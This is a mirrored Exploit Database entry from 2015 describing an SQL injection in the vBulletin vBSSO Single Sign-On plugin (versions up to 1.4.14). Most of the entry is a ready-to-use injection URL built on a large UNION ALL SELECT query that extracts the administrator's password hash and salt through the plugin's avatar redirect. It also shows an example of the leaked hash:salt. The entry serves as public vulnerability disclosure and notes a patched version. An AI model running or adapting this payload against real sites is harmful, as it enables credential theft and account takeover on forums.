vBulletin vBSSO Single Sign-On 1.4.14 – SQL Injection

• Exploit Database
• 138 阅读

• 作者： Technidev
  日期： 2015-01-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35860/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37

  # Exploit Title: vBulletin vBSSO Single Sign-On – <= 1.4.14 – SQL Injection # Date: January 20, 2015 # Exploit Author: Technidev (https://technidev.com) # Vendor Homepage: https://vbulletin.com # Software Link: http://www.vbulletin.org/forum/showthread.php?t=270517 # Version: <= 1.4.14, patched in >= 1.4.15   This plugin is vulnerable to SQL injection at the /vbsso/avatar.php file in the fetchUserinfo function. It requires a big UNION ALL SELECT query and commenting out the LIMIT function of SQL. If SQL injection is a success, the browser will redirect the user to a URL where the URL contains the extracted information.   To exploit this, you need to execute a rather large UNION ALL SELECT query like this: http://example.com/vbsso/vbsso.php?a=act&do=avatar&id=&apos; or user.userid = 1 UNION ALL SELECT userfield.*, usertextfield.*, user.*, usergroup.genericpermissions, UNIX_TIMESTAMP(passworddate) AS passworddate, IF(displaygroupid=0, user.usergroupid, displaygroupid) AS displaygroupid, concat(user.password, 0x3a, user.salt) AS avatarpath, NOT ISNULL(customavatar.userid) AS hascustomavatar, customavatar.dateline AS avatardateline, customavatar.width AS avwidth, customavatar.height AS avheight, customavatar.height_thumb AS avheight_thumb, customavatar.width_thumb AS avwidth_thumb, customavatar.filedata_thumb FROM user AS user LEFT JOIN userfield AS userfield ON (user.userid = userfield.userid) LEFT JOIN usergroup AS usergroup ON (usergroup.usergroupid = user.usergroupid) LEFT JOIN usertextfield AS usertextfield ON (usertextfield.userid = user.userid) LEFT JOIN avatar AS avatar ON (avatar.avatarid = user.avatarid) LEFT JOIN customavatar AS customavatar ON (customavatar.userid = user.userid) WHERE user.userid = 1 ORDER BY avatarpath DESC%23   For example, by visiting this URL on a vulnerable forum, you will be redirected to http://example.com/9d0d647f535a4c1f493eabf3d69ca89a:nO^sh9;TVNxGJ”X’+3cYkq9Z4Cd3WS which obviously contains the hash and salt of userid 1.